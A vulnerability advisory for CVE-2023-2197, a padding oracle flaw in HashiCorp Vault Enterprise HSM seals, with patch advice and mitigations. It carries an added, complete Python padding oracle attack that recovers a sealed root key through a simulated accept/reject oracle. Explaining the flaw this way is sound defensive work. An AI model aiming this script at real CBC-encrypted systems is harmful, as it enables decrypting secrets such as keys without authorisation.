PT-2023-18357 · Hashicorp · Hashicorp Vault Enterprise
Published
2023-05-01
·
Updated
2025-01-30
·
CVE-2023-2197
CVSS v3.1
2.5
Low
| Vector | AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
HashiCorp Vault Enterprise versions 1.13.0 through 1.13.1
Description
Vault Enterprise is vulnerable to a padding oracle attack when an HSM seal is used with the CKM_AES_CBC_PAD or CKM_AES_CBC encryption mechanisms. An attacker with privileges to modify storage and restart Vault may be able to intercept or modify ciphertext in order to derive Vault's root key. The restart is what turns each tampered ciphertext into an oracle query: Vault only sends the sealed root key to the HSM for decryption when it unseals, so whether the tampered blob is accepted or rejected is observable once per restart.
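The attack the description refers to, worked through as an added example that is not part of this advisory or of HashiCorp's code. A padding oracle attack is cipher-agnostic: only CBC mode, PKCS#7 padding and a one-bit accept/reject signal matter, so the HSM's AES is replaced here by a toy 4-round Feistel permutation built from HMAC-SHA256 (an assumption, chosen so the block runs with the standard library alone). The `seal_oracle` function is a hypothetical stand-in for "modify the stored blob, restart Vault, see whether it unseals"; the key, IV and root-key bytes are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 16          # block size in bytes, as for AES
HALF = BLOCK // 2

# Constructed sample values (not from the advisory): the seal key held by the
# "HSM", an IV, and the secret standing in for Vault's root key.
KEY = b"constructed-hsm-seal-key"
IV = bytes(range(BLOCK))
ROOT_KEY = b"vault-root-key-material-example"

def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed Feistel round function: HMAC-SHA256 truncated to a half block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 4-round Feistel permutation standing in for the HSM's AES (assumption).
    l, r = block[:HALF], block[HALF:]
    for rnd in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _round_fn(key, rnd, r)))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _round_fn(key, rnd, l))), l
    return l + r

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # CBC with PKCS#7 padding, i.e. what CKM_AES_CBC_PAD does; returns iv || ct.
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev)))
        out += prev
    return iv + out

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    iv, ct = data[:BLOCK], data[BLOCK:]
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        cur = ct[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(block_decrypt(key, cur), prev))
        prev = cur
    return pkcs7_unpad(out)

def seal_oracle(key: bytes, data: bytes) -> bool:
    # Hypothetical stand-in for "restart Vault and see whether it unseals":
    # True if the sealed blob decrypts with valid padding. This single bit is
    # the whole leak the attack needs.
    try:
        cbc_decrypt(key, data)
        return True
    except ValueError:
        return False

def padding_oracle_attack(oracle, data: bytes) -> bytes:
    # Recover the plaintext of iv || ct using only the padding-validity oracle.
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    recovered = b""
    for idx in range(1, len(blocks)):
        prev, target = blocks[idx - 1], blocks[idx]
        inter = bytearray(BLOCK)            # block_decrypt(target), found byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos               # padding value we try to force at this position
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ pad   # known bytes are made to decrypt to `pad`
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # Rule out a longer padding (0x02 0x02 ...) that also validates:
                    # disturb the byte before; a genuine 0x01 pad must still pass.
                    forged[pos - 1] ^= 1
                    if not oracle(bytes(forged) + target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle never accepted a guess; not a padding oracle?")
        recovered += bytes(a ^ b for a, b in zip(inter, prev))
    return pkcs7_unpad(recovered)

def recover_root_key() -> bytes:
    # Seal ROOT_KEY under KEY, then recover it without KEY through the oracle alone.
    sealed = cbc_encrypt(KEY, IV, ROOT_KEY)
    return padding_oracle_attack(lambda blob: seal_oracle(KEY, blob), sealed)

if __name__ == "__main__":
    print(recover_root_key())
```

The attack needs at most 256 oracle queries per plaintext byte, and the attacker never touches the key: it only rewrites the block preceding the one under attack (the IV for the first block), which is exactly the "modify storage" capability the advisory names. An AEAD mechanism, or a MAC over the ciphertext checked before decryption, removes the signal because tampered blobs are rejected before any padding is examined.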
Recommendations
For HashiCorp Vault Enterprise versions 1.13.0 through 1.13.1, update to version 1.13.2 to resolve the issue. As a temporary workaround, consider restricting access to the HSM and limiting privileges to modify storage and restart Vault until the update is applied.
Weakness Enumeration
Inadequate Encryption Strength (CWE-326)
Related Identifiers
CVE-2023-2197
Affected Products
Hashicorp Vault Enterprise